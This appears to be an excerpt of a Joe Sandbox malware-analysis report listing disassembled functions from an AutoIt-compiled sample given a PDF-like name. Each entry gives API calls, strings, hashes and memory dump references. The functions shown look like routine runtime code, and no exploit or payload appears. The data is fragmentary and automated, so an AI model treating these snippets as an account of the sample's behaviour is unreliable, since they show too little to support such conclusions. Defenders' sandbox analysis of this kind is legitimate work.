                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 2496851823-2422070025
                                                                          • Opcode ID: c95d620326fce9beeef0ccf47fea4870421c67ec61aac0df6244c61ce7dcd0e1
                                                                          • Instruction ID: 4c621c1ea0fea3624a5f0893c0b1e5773da116e8c04bfa468d4f4d041022b28f
                                                                          • Opcode Fuzzy Hash: c95d620326fce9beeef0ccf47fea4870421c67ec61aac0df6244c61ce7dcd0e1
                                                                          • Instruction Fuzzy Hash: 3611A135600245ABDB20AF64DC86FBDB3B4FF04321F2085AAFD11A72D1DE72A819C795
                                                                          Function 00B392E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B39355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 45d7a8950943e3c0dc8c20670fe2581b906ba0c40b62501f7b1f8bb3b5a0578e
                                                                          • Instruction ID: 7e3bcba3b4d17327d6fc52ec1ddae1a39ff5489aec9575d16c514ca43d47a3c1
                                                                          • Opcode Fuzzy Hash: 45d7a8950943e3c0dc8c20670fe2581b906ba0c40b62501f7b1f8bb3b5a0578e
                                                                          • Instruction Fuzzy Hash: C501B571A45215ABCB04EB65CC91CFE77A9FF46320F240699F932572D1DB715908C650
                                                                          Function 00B391DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B3924D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 51f1451a22bb063f7752847d33a10ea4974e2830ac1613b7bdd9da58f4792bae
                                                                          • Instruction ID: 1f5c117b689f76b41f67fb583360d695de1d62f36a8d25890bd9cd0c57d3285c
                                                                          • Opcode Fuzzy Hash: 51f1451a22bb063f7752847d33a10ea4974e2830ac1613b7bdd9da58f4792bae
                                                                          • Instruction Fuzzy Hash: ED018F71A412087BCB08EBA4CD96EFFB3E8DF55340F2400A9B91267291EA556E0C96B1
                                                                          Function 00B39264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B392D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 5f780119ab55aab135ec68b21f7cc95dbc125a32cc33387c3d3145df91961099
                                                                          • Instruction ID: 96cc6b11af0780454d8571619ba5fffc2e3076f0a4e7e0d0303a09751626b0b9
                                                                          • Opcode Fuzzy Hash: 5f780119ab55aab135ec68b21f7cc95dbc125a32cc33387c3d3145df91961099
                                                                          • Instruction Fuzzy Hash: 5E01A271A4120877CF04EAA4CD82EFF77EC9F15340F2401A9B91267292DA615E0C9671
                                                                          Function 00B451CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp
                                                                          • String ID: #32770
                                                                          • API String ID: 2292705959-463685578
                                                                          • Opcode ID: e57923a28512d69b57fdd99977d6b00f60d979643c794481b5b7b1f448591503
                                                                          • Instruction ID: e492041353e4fdbba2a464c05348b55abf9f9247d518ef7037518ec6cf8ef9f2
                                                                          • Opcode Fuzzy Hash: e57923a28512d69b57fdd99977d6b00f60d979643c794481b5b7b1f448591503
                                                                          • Instruction Fuzzy Hash: 9CE0D17390422D27D7209B95AC49FA7F7ECEB55B71F0001A7FD14D3051D9609E4587E1
                                                                          Function 00B381BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B381CA
                                                                            • Part of subcall function 00B03598: _doexit.LIBCMT ref: 00B035A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: a0569d8aecebfa061c4070b858c303c3e9f1bf475da1c7f1e0e2d697e8aef96f
                                                                          • Instruction ID: 7d8c7fa156a02f907410adc4325da2c0bef817c5162615d7fc485980dfae809f
                                                                          • Opcode Fuzzy Hash: a0569d8aecebfa061c4070b858c303c3e9f1bf475da1c7f1e0e2d697e8aef96f
                                                                          • Instruction Fuzzy Hash: E8D02B323C431832D21532FD6D0BFC539CC8B09F51F0044A6FB48551E38DD5488142ED
                                                                          Function 00B1B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B1B564: _memset.LIBCMT ref: 00B1B571
                                                                            • Part of subcall function 00B00B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B1B540,?,?,?,00AE100A), ref: 00B00B89
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00AE100A), ref: 00B1B544
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AE100A), ref: 00B1B553
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B1B54E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 3158253471-631824599
                                                                          • Opcode ID: 96adb746af73d0b8a2eb18eecec5b122b3fc9eb2359d956c44fad6ec30538e79
                                                                          • Instruction ID: eeb4c698504525d8501b881fc3eee881b90a41a0d6df7b6da5c541e3e16300e9
                                                                          • Opcode Fuzzy Hash: 96adb746af73d0b8a2eb18eecec5b122b3fc9eb2359d956c44fad6ec30538e79
                                                                          • Instruction Fuzzy Hash: 69E06DB16103528BD720EF28E414B827BE0EB14705F0489ACE446C36A0DBB8D484CBA1
                                                                          Function 00B65BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B65BF5
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B65C08
                                                                            • Part of subcall function 00B454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: a1e60799c2aa156950cb52674a4f56d1717c764798da19ce13e87465eaaf32d4
                                                                          • Instruction ID: e0f7930928e1317cba0b2b025edc9d1eb614a62f879d42a09bcf58b791131a06
                                                                          • Opcode Fuzzy Hash: a1e60799c2aa156950cb52674a4f56d1717c764798da19ce13e87465eaaf32d4
                                                                          • Instruction Fuzzy Hash: A7D0A931388312B7E774AB30BC0BFA32A50AB00B00F000835B306AA1E1CCE85800C240